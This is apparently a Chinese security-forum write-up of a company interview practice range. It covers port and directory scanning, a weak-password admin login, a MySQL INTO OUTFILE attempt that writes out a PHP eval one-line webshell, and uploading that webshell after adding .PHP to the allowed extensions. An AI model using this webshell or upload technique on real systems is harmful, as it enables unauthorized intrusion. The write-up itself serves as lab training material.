通关某公司面试靶场

冰封小天堂   ·   发表于 2020-11-26 10:00:02   ·   实战纪实

0x00:探测IP

首先打开时候长这个样,一开始感觉是迷惑行为,试了试/admin,/login这些发现都没有

随后F12查看网络,看到几个js文件带有传参,就丢sqlmap跑了一下无果放弃

随后也反查了域名一下,发现没有域名,是阿里云的,这里突然醒悟,我第一步是信息收集。

kali linux启动,nmap 启动,直接常规扫描一波,发现开启了这么多,ftp和ssh可以爆破,但因为是靶场弱口令暂时不想了,smtp和pop3都是邮件服务,80是个幌子也不予考虑,8888是宝塔管理界面,得到信息这是宝塔搭建的,弱口令试了下无果,而且限制登陆次数,暂时先记下,8081重点,这里我第一次访问它貌似因为网络问题没有打开,所以哦我就以为不是,结果后来扫了全端口还是这几个我就炸了,这TM有毒吧,问了花哥,花哥表示让我访问8081,尼玛能打开了

得到憨批页面一个,搜了下,这个是宝塔创建完成的正常页面,直接目录扫描,kali的dirb抽风半天都不扫md,就换了御剑

0x01:挖掘漏洞

这里一开始我并没有搞到路径,还是花哥给了test这个路径才开始的,主页很普通就正常的那些销售页面

虽然有跟数据库交互,但都已经写死了,你修改值可以,但是+ - *什么的都不会起作用,注入点无效,有留言板但是这靶场没有机器人访问,所以xss随手试了个简单的就扔了,搜索框也进行了xss和sql测试,无果

然后开始扫目录,刚开始扫的时候后面还没扫到,不过扫到了使用手册,直接去访问

这里需要将编码换成utf-8,这里看到了后台地址,我们直接去访问,得到后台地址

既然还没验证码什么的第一想法就是爆破了,但那之前先随手几个弱口令,admin/123456 admin/admin123
第二个直接进去了- -

直接管理员权限,奥里给,我们离成功很近了

0x02:挖掘后台信息

这里每个都要注意一下,细心很重要(至粗心大意的自己)

基本设置这里,发现可以控制上传文件后缀,自然把.PHP加上去

这里看到了数据库备份,但有提醒别乱搞就没碰,并没有看到明显的上传点,

在到处溜达了一下在系统信息这里看到了sql语句执行,自然就想到了mysql写一句话
并且在系统信息部分我们拿到了绝对路径出来,从路径看这是个linux系统

然后就是写文件,这里用了outfile和dumpfile,结果都不行,写txt也不行,陷入沉思这到底是什么情况

语句:select ‘<?php @eval($_POST[cmd]);?>’ INTO OUTFILE ‘/www/wwwroot/39.xx.xx.52/test/cmd.php’

回到扫描器,发现,哦吼phpinfo,居然没删,

这里我以为绝对路径错了,仔细检查后发现没错,然后继续沉思,到底哪里出问题了,后来有小道消息说这是考文件上传的,扑哧,那这么说都没开启写文件啊,我TM真是

0x03:寻找文件上传功能点

发现疑似可以利用的地方,虽然这里说是上传图片,不过类型都被我改了上传啥还不是咱说了算,上传试试

此处注意要允许运行flash,不然会无法点击选择文件之类的东西

选择我们的一句话,冲啊

成功上传,等等似乎不对,这样我没路径上传了有个屁用啊淦

抓包重来,这里我们并没看到啥可利用的信息,看来要抓返回包,右键选择它即可抓返回包

从返回中我们得到路径,直接getshell (这里就很wc了,我之前做的时候它每次都让我登录,所以我就放弃了这个点,md,结果写文章时候他又可以了淦)

0x04:备用方法

下面是如果上面的失败,如何操作,找到栏目管理,修改任意一个

这里也有一个一样的上传点,但我们现在的就是那个走不通,可以看到下面有个编辑器,我们选择附件

选择我们的一句话,注意这里也要允许运行flash才可以,不然会报错

直接上传上去

发现这里多了一个,说明传上去了,然后哦我们在提交一下,去这个页面看看

这里知道目录方法有多个,点击这个他会告诉我们,或者抓返回包,这里我用的最简单无脑的,我们直接去这个页面看一看,最后就可以看到该文件,直接你写的?xxxx=phpinfo(); 连接蚁剑即可

最后打波小广告欢迎关注公众号神隐安全团队

用户名金币积分时间理由
李的姓名 1.00 0 2020-11-28 17:05:45 受益
奖励系统 100.00 0 2020-11-28 09:09:53 投稿满 10 赞奖励
奖励系统 50.00 0 2020-11-26 15:03:08 投稿满 5 赞奖励
veek 150.00 0 2020-11-26 10:10:32 一个受益终生的帖子~~

打赏我,让我更有动力~

5 Reply   |  Until 2021-5-4 | 1031 View

李的姓名
发表于 2020-11-28

请教一下几期的学长呢
有点难哦 望其项背

评论列表

  • 加载数据中...

编写评论内容

lwq
发表于 2020-11-28

望其项背哈哈

评论列表

  • 加载数据中...

编写评论内容

病毒裁缝
发表于 2020-11-29

我看到有个lmxcms有没有试一下通用的漏洞呢?

评论列表

  • 加载数据中...

编写评论内容

a1287074202
发表于 2021-4-9

什么平台

评论列表

  • 加载数据中...

编写评论内容

sechacker
发表于 2021-5-4

师傅 不错啊 靶场源代码分享一下呗

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.